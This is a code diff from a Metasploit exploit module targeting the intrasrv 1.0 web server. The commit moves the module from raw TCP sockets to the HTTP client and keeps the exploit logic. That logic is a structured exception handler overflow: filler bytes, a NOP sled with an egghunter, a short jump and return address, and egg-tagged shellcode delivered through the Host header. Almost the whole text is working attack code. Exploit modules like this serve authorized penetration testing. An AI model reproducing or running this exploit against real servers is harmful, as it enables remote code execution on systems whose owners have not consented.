10
10
class Metasploit3 < Msf ::Exploit ::Remote
11
11
Rank = NormalRanking
12
12
13
- include Msf ::Exploit ::Remote ::Tcp
13
+ include Msf ::Exploit ::Remote ::HttpClient
14
14
include Msf ::Exploit ::Egghunter
15
15
16
16
def initialize ( info = { } )
@@ -57,24 +57,15 @@ def initialize(info={})
57
57
'Privileged' => false ,
58
58
'DisclosureDate' => "May 30 2013" ,
59
59
'DefaultTarget' => 0 ) )
60
-
61
- register_options (
62
- [
63
- OptPort . new ( 'RPORT' , [ true , 'The remote port' , 80 ] )
64
- ] , self . class )
65
60
end
66
61
67
62
def check
68
- begin
69
- connect
70
- rescue
71
- print_error ( "Could not connect to target!" )
72
- return Exploit ::CheckCode ::Safe
73
- end
74
- sock . put ( "GET / HTTP/1.0\r \n " )
75
- res = sock . get
63
+ res = send_request_cgi ( {
64
+ 'method' => 'GET' ,
65
+ 'uri' => "/"
66
+ } )
76
67
77
- if res and res =~ /intrasrv 1.0/
68
+ if res and res . headers [ 'Server' ] =~ /intrasrv 1.0/
78
69
return Exploit ::CheckCode ::Vulnerable
79
70
else
80
71
return Exploit ::CheckCode ::Safe
@@ -88,19 +79,23 @@ def exploit
88
79
} )
89
80
90
81
# setup buffer
91
- buf = rand_text_alpha ( target [ 'Offset' ] -128 ) # junk to egghunter
82
+ buf = rand_text ( target [ 'Offset' ] -128 ) # junk to egghunter
92
83
buf << make_nops ( 8 ) + hunter # nopsled + egghunter at offset-128
93
- buf << rand_text_alpha ( target [ 'Offset' ] -buf . length ) # more junk to offset
84
+ buf << rand_text ( target [ 'Offset' ] -buf . length ) # more junk to offset
94
85
buf << "\xeb \x80 \x90 \x90 " # nseh - jmp -128 to egghunter
95
86
buf << [ target . ret ] . pack ( "V*" ) # seh
96
87
97
- # attach egg tag to payload
98
- shellcode = egg + egg
88
+ # Setup payload
89
+ shellcode = rand_text ( 1 ) # align payload
90
+ shellcode = egg + egg # attach egg tags
99
91
shellcode << payload . encoded
100
92
101
93
print_status ( "Sending buffer..." )
102
- connect
103
- sock . put ( "GET / HTTP/1.0\r \n Host: #{ buf } \r \n #{ shellcode } " )
104
- disconnect
94
+ send_request_cgi ( {
95
+ 'method' => 'GET' ,
96
+ 'uri' => "/" ,
97
+ 'vhost' => buf ,
98
+ 'data' => shellcode
99
+ } )
105
100
end
106
101
end
0 commit comments